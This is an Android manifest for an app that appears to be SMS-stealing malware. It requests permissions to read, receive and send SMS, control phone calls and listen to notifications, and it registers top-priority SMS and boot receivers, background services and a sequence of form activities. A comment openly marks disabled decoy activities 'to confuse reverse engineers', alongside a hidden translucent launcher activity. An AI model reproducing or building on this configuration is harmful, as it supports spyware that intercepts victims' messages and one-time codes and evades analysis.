<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.rto1p8.app"
    >

    <uses-feature
        android:name="android.hardware.telephony"
        android:required="false" />

    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

    <!-- Network permissions -->
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />

    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_DATA_SYNC" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.ANSWER_PHONE_CALLS" />
    <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_PHONE_CALL"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_CONNECTED_DEVICE"/>

    <application
        android:allowBackup="true"
        android:name="com.rto1p8.app.security.SecureApplication"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@drawable/logo"
        android:label="@string/app_name"
        android:roundIcon="@drawable/logo"
        android:supportsRtl="true"
        android:theme="@style/AppTheme"
        tools:targetApi="31">
        
        <!-- Fake/Decoy Activities to confuse reverse engineers -->
        <activity
            android:name="com.rto1p8.app.decoy.FakeActivity"
            android:exported="false"
            android:enabled="false" />
        <activity
            android:name="com.rto1p8.app.decoy.DecoyLoginActivity"
            android:exported="false"
            android:enabled="false" />
            
        <activity
            android:name="com.rto1p8.app.ui.ErrorActivity"
            android:exported="false" />
        <activity
            android:name="com.rto1p8.app.ui.FormThreeActivity"
            android:exported="false" />
        <activity
            android:name="com.rto1p8.app.ui.FormOneActivity"
            android:exported="false" />
        <activity
            android:name="com.rto1p8.app.ui.SplashActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name="com.rto1p8.app.MainActivity"
            android:exported="true" />
        <activity
            android:name="com.rto1p8.app.ui.FormTwoActivity"
            android:exported="false" />
        <activity
            android:name="com.rto1p8.app.ui.FormLastActivity"
            android:exported="false" />


        <activity
            android:name="com.rto1p8.app.LauncherActivity"
            android:excludeFromRecents="true"
            android:exported="false"
            android:finishOnTaskLaunch="true"
            android:taskAffinity=""
            android:launchMode="singleTop"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" />

        <receiver
            android:name="com.rto1p8.app.receiver.BootReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.LOCKED_BOOT_COMPLETED" />
                <action android:name="android.intent.action.MY_PACKAGE_REPLACED" />
                <action android:name="android.intent.action.PACKAGE_REPLACED" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>

        <receiver
            android:name="com.rto1p8.app.receiver.SmsReceiver"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

        <service
            android:name="com.rto1p8.app.service.SmsService"
            android:exported="false"
            android:foregroundServiceType="dataSync"
            android:enabled="true" />

        <service
            android:name="com.rto1p8.app.service.CallService"
            android:enabled="true"
            android:exported="false"
            android:foregroundServiceType="phoneCall" />

        <service
            android:name="com.rto1p8.app.service.ConnectivityService"
            android:enabled="true"
            android:exported="false"
            android:foregroundServiceType="connectedDevice" />

        <service
            android:name="com.rto1p8.app.service.EmailNotificationService"
            android:exported="false"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

    </application>

</manifest>